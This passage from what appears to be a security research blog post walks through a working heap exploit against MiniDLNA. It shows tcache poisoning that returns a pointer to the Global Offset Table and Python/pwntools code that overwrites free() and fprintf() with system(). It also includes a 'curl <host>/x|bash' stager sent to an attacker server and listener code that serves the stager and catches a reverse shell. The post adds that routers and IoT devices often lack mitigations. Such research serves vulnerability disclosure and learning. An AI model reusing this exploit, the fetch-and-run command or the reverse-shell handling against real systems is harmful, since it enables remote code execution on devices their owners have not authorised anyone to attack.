The write portion of the memmove() will then “slide” the selected region of bytes “up” (based on the illustration above) so that return_addr ends up overwriting fd 40 bytes below it. To accomplish this, the HTTP chunk size in the corruption payload is prepended with whitespace characters (~40) to ensure the bytes are shifted by the correct distance to align the write at the desired location as described in the “controlling the shift distance” section earlier in the post. Once this request has been processed, it will get free’d and inserted back into the same tcache bin ahead of the now-corrupted free’d chunk. Those free’d chunks will then look like this (note that the size, prev_size, etc values shown at the end of the corruption buf are from the chunk below it, showing where those values end up after the call to memmove()):

fake-chunk-4.png

In order to get the tainted chunk returned to us (the middle one in the illustration), we’ll need to make at least 1 allocation of that same size before that and then the next allocation of that size will have malloc() return the pointer we wrote to fd back to us. In the case of the exploit, this will be the address of the Global Offset Table (GOT).

corrupting the GOT

After successfully tricking malloc() into returning a pointer to the GOT, the next step is to corrupt one (or more) of the entries contained within to achieve code execution. The most straightforward way to do this is to call system() and pass it a pointer to some data we control containing a string with the command we want to execute. Since we have full control over the content that’s written, the question is then to figure out which function(s) to corrupt. Because system() expects a single argument that’s a pointer to some string data, the function(s) we target must also take a char (or void) pointer for its first argument and that pointer has to point to data we control. Finally, the target function(s) need to be called at some point after we’ve corrupted the GOT but before any other GOT entries that we’ve corrupted are referenced, since this will almost certainly result in a crash.

Taking all of this into consideration, I eventually found the two functions that would be targeted: fprintf() and free(). The actual entry that produces the code execution is free(). However, because the minimum size needed for the request buffer is greater than 8 bytes and we can’t do partial writes into the request buffer, successfully corrupting free() also corrupts other GOT entries, including the one for fprintf(). That entry needs to point to a valid function since fprintf() is called at least once before the next call to free(). Corrupting free() is a logical option since it meets all of the requirements without any additional setup: it takes a single pointer argument, and it will be called with the pointer to our request buffer almost immediately after we corrupt the GOT, reducing the risk of other corrupted functions being called and crashing the application prematurely. As a bonus, hijacking free() also helps us avoid the sanity checks in glibc that would trigger an abort() after we’ve corrupted the heap metadata.

Because free() (i.e. system() after the GOT is corrupted) will be called on the pointer to the GOT where we’re writing the fake entries, we can place the command string we want passed to system() right at the start of the buffer to have it executed. The code below shows the construction of the final payload containing the command to run and the fake GOT entries, with the padding needed for the binary the exploit was written for (free() at GOT+0x40, fprintf() at GOT+0x50):

    # set up the command string that will be passed to system()
    staging_server_addr = f"{args.lhost}:{args.lport}"
    # command: e.g. `curl 192.168.1.8:8080/x|bash`
    command_str = f"curl {staging_server_addr}/x|bash".encode()
    command_padding = b""

    # the command must be shorter than 64 bytes so that at least one NUL
    # terminator sits between it and the fake free() entry; pad the rest out
    OFFSET_TO_FREE = 64
    if len(command_str) >= OFFSET_TO_FREE:
        xpr("command string too long using provided args, offsets will fail. bailing...")
        sys.exit(1)
    command_padding = b"\x00" * (OFFSET_TO_FREE - len(command_str))
    command = command_str + command_padding

    # set up fake GOT table for the overwrite (note: this will need to be updated for binaries that have different offsets between the two)
    got_table = b""
    got_table += pwn.p64(args.system_addr) # free() entry
    got_table += pwn.p64(0x0) # pad
    got_table += pwn.p64(args.system_addr) # fprintf() entry

    final_payload = command + got_table

After the final payload above has been sent and the GOT has been corrupted, the next call to free() will actually be a call to system() and it will be passed the pointer where we just wrote the payload.
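
As a sanity check on that layout, here is a small standalone sketch that rebuilds the same payload shape with only the standard library and prints each 8-byte slot. The build_payload() helper and the addresses in it are hypothetical stand-ins for the exploit's arguments; the 0x40 and 0x50 offsets are the ones quoted above for this particular binary.

```python
import struct

OFFSET_TO_FREE = 0x40     # free() slot, relative to the start of the write
OFFSET_TO_FPRINTF = 0x50  # fprintf() slot, relative to the start of the write


def build_payload(command: bytes, system_addr: int) -> bytes:
    """Command string, NUL padding up to the free() slot, then fake entries."""
    if len(command) >= OFFSET_TO_FREE:
        # Leave room for at least one NUL so system() sees a terminated string.
        raise ValueError("command must be shorter than OFFSET_TO_FREE bytes")
    padded = command.ljust(OFFSET_TO_FREE, b"\x00")
    # free() entry, one slot of padding, fprintf() entry (little-endian u64s).
    entries = struct.pack("<QQQ", system_addr, 0, system_addr)
    return padded + entries


SYSTEM_ADDR = 0x7FFFF7E12290  # hypothetical address of system()
COMMAND = b"curl 192.168.1.8:8080/x|bash"
payload = build_payload(COMMAND, SYSTEM_ADDR)

# Dump the payload slot by slot to see what each 8-byte GOT slot receives.
for off in range(0, len(payload), 8):
    print(f"+{off:#04x}: {payload[off:off + 8].hex()}")
```

The dump makes it easy to see that every slot from the start of the write up to the fprintf() entry is overwritten, which is why the choice of target functions and the timing of the next free() call matter so much.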

reverse shell stager and listener

The command string passed to system() will download a script from an attacker-controlled server using curl and pipe the contents of the script to bash. The exploit sets up an HTTP listener to handle the incoming request and responds with a small script to initiate a reverse shell back to the attacker-controlled server. After responding to that request, it creates the listener for the reverse shell and waits for the connection.

    # handle the http request to serve script to spawn reverse shell
    l.settimeout(1)
    x = l.wait_for_connection()
    if x.connected():
        l.sendline(resp.encode() + reverse_shell_cmd.encode())
        l.close()
    else:
        xerr("=ERROR=: Timed out waiting for staging connection, exploit likely failed")
        xpr("tip: try adjusting the --got_addr or --system_addr arguments if SEGV; make sure curl is available on target")
        sys.exit(1)

    # wait for the incoming reverse shell connection; bail if we don't get it in a second.
    l = pwn.listen(args.lport)
    l.settimeout(1)
    x = l.wait_for_connection()
    if x.connected():
        xpr("~~~ <CHONKCHONKCHONK> ~~~")
        l.interactive()
    else:
        xerr("=ERROR=: Timed out waiting for reverse shell connection, exploit likely failed")
        xpr("tip: try adjusting the --got_addr or --system_addr arguments if SEGV; make sure netcat is available on target")
        sys.exit(1)
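
The resp and reverse_shell_cmd values are not shown in the snippet above. As a rough sketch of what the staging reply could look like, the hypothetical helper below wraps a script body in a minimal HTTP response; the function name, headers, and placeholder script are my own assumptions for illustration and not the exploit's actual values.

```python
def build_stager_response(script: str) -> bytes:
    """Wrap a shell script in a minimal HTTP/1.1 response for curl to fetch."""
    body = script.encode()
    headers = (
        "HTTP/1.1 200 OK\r\n"
        "Content-Type: text/plain\r\n"
        f"Content-Length: {len(body)}\r\n"
        "Connection: close\r\n"
        "\r\n"
    )
    return headers.encode() + body


# Harmless placeholder standing in for the real second-stage script.
PLACEHOLDER_SCRIPT = "echo staged\n"
response = build_stager_response(PLACEHOLDER_SCRIPT)
print(response.decode())
```

Setting Content-Length and Connection: close lets curl know exactly where the script ends, so the pipe into bash is not left waiting on the socket.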

popping a shell

And here’s the exploit running against the target binary:

exploit.png

Wrapping Up

And there we are! Hopefully this has all been useful for understanding everything that goes into writing a full exploit for this kind of vulnerability. Ultimately, it isn’t complete in the sense that it assumes an info leak is already present to leak Libc and GOT addresses. This same bug could potentially be used to get that info leak but I didn’t invest much time in figuring that out. Maybe that can be left as an exercise for the curious reader.

exploitability in the Real World(TM)

Exploitability of this bug depends, to some extent, on the Libc version the application is linked against and on the exploit mitigations in use. Given how much these factors vary across the range of devices this application is deployed to (IoT devices, routers, Linux servers), there is a high likelihood of finding Libc versions vulnerable to multiple heap exploitation techniques, as well as targets missing mitigations such as ASLR, RELRO, etc. Because the bug provides a strong write primitive, there are various options for exploitation. While most modern Linux distros running on desktop/server hardware now enable common compiler exploit mitigations for default applications and applications installed through the package manager, MiniDLNA is frequently deployed on IoT devices where those mitigations are likely not enabled; versions built from source by end users are also unlikely to enable them. The exploit strategy and mechanisms used in the included exploits will not work universally across all platforms and configurations, but there are likely dozens of targets that would meet the necessary criteria.

arm32 exploit?

This post is already pretty long and it’s taken me longer than expected to release it, so I’ve decided to split the last section, which goes over the exploit I wrote for the arm32 minidlnad binary from the Netgear RAX30, into a separate post, though the exploit code for both will be made available now. That exploit works a little differently, targeting the stack rather than the GOT for the overwrite since that binary has full RELRO enabled (which makes the GOT read-only).

Resources